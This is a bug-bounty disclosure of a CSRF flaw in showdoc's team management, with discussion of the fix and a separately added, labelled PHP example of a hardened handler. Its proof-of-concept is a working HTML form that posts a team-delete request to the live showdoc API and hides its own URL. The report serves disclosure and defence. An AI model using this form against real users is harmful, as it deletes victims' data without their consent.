Cross-Site Request Forgery (CSRF) in star7th/showdoc

Valid

Reported on

Nov 21st 2021


Description

The strict flag (SameSite=Strict) is set on only one cookie, cookie_token. The PHPSESSID session cookie has no SameSite flag, so in Team management an attacker can still add or delete teams through a CSRF request: the browser attaches PHPSESSID to a cross-site POST and the server accepts the request on the strength of that session cookie alone.

Proof of Concept

1. Replace 38046 in poc.html with the target team id.

2. While logged in to showdoc, open poc.html and click the submit button.

3. The team with id 38046 (or the id you substituted) is deleted.

<!-- poc.html -->
<html>
  <body>
    <!-- Rewrite the URL bar so the PoC page's own path is not shown. -->
    <script>history.pushState('', '', '/')</script>
    <!-- Cross-site POST to the team delete API; the victim's PHPSESSID cookie is sent with it. -->
    <form action="https://www.showdoc.com.cn/server/index.php?s=/api/team/delete" method="POST">
      <input type="hidden" name="id" value="38046" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
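For contrast with the PoC, the following is an added example of a hardened server-side pattern for the same kind of endpoint. It is not code from showdoc or from the fix commit: the session cookie is issued with SameSite=Strict (plus Secure and HttpOnly), the session id is regenerated at login so a PHPSESSID issued before the fix is not carried over, and a per-session CSRF token is required on the state-changing request. The function names, the response array shape and the two requests at the bottom are assumptions made for illustration.

```php
<?php
// Added example, not showdoc code. Function names and the response
// array shape are hypothetical; the two requests at the bottom are constructed.

// Issue the PHP session cookie with SameSite=Strict so browsers omit it
// from cross-site requests such as the PoC form post. The options-array
// form of session_set_cookie_params() requires PHP 7.3 or newer.
function start_hardened_session(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'domain'   => '',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
    session_start();
}

// On login, replace the session id and mint a fresh CSRF token. Without
// session_regenerate_id() a PHPSESSID set before the fix survives re-login,
// which is the behaviour the maintainer describes in the thread.
function login_user(int $userId): void
{
    session_regenerate_id(true);
    $_SESSION['user_id']    = $userId;
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

// Constant-time comparison of the submitted token against the session copy.
function csrf_token_is_valid(array $post, array $session): bool
{
    $sent     = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    return is_string($sent) && $expected !== '' && hash_equals($expected, $sent);
}

// Handler for a team-delete request. $server/$post/$session stand in for
// $_SERVER/$_POST/$_SESSION so the function can be exercised directly.
function handle_team_delete(array $server, array $post, array $session): array
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return ['error_code' => 405, 'error_message' => 'method not allowed'];
    }
    if (empty($session['user_id'])) {
        return ['error_code' => 401, 'error_message' => 'not logged in'];
    }
    if (!csrf_token_is_valid($post, $session)) {
        return ['error_code' => 403, 'error_message' => 'missing or invalid CSRF token'];
    }
    $teamId = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT);
    if ($teamId === false) {
        return ['error_code' => 400, 'error_message' => 'invalid team id'];
    }
    // Ownership check and the actual delete would follow here.
    return ['error_code' => 0, 'deleted_team_id' => $teamId];
}

// Constructed demonstration: the PoC form carries only the id field and
// no token, so it is refused; a same-site form that includes the token succeeds.
$session = ['user_id' => 1, 'csrf_token' => str_repeat('a', 64)];

$forged = handle_team_delete(
    ['REQUEST_METHOD' => 'POST'],
    ['id' => '38046'],
    $session
);
$legit = handle_team_delete(
    ['REQUEST_METHOD' => 'POST'],
    ['id' => '38046', 'csrf_token' => str_repeat('a', 64)],
    $session
);
var_dump($forged['error_code'] === 403 && $legit['deleted_team_id'] === 38046);
```

start_hardened_session() and login_user() need a real request context, so the demonstration at the bottom only exercises the handler. The cookie flag and the token check are complementary: SameSite=Strict stops the browser from sending PHPSESSID with the PoC's cross-site POST at all, while the token check rejects the request even from a browser that does not honour SameSite.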
We are processing your report and will contact the star7th/showdoc team within 24 hours. 7 days ago
star7th validated this vulnerability 6 days ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
star7th confirmed that a fix has been merged on 654e87 6 days ago
star7th has been awarded the fix bounty
ItemModel.class.php#L1-L40 has been validated
star7th
6 days ago

Maintainer


I should fix it. You can test it.

amammad
6 days ago

Researcher


Hey chen

Not fixed, and it behaves just like before (I logged out of the system and logged in again).

This is a fix commit that has a good fix for strict cookies:

https://github.com/devcode-it/openstamanager/blob/402dca9162a84cf7617a8bbd582aa9ad51259016/core.php#L58

Jamie Slome
5 days ago

Admin


@amammad 👋 it looks like a bug on our side caused the disclosure bounty to be set to $155. We have reset it to the value displayed at disclosure ($64). Apologies for the confusion or inconvenience.

star7th
4 days ago

Maintainer


@amammad You can close the browser and open it again. Because the previous phpsessid was automatically maintained by the program, you need to restart the browser to invalidate it. If you log in again, the phpsessid is not regenerated.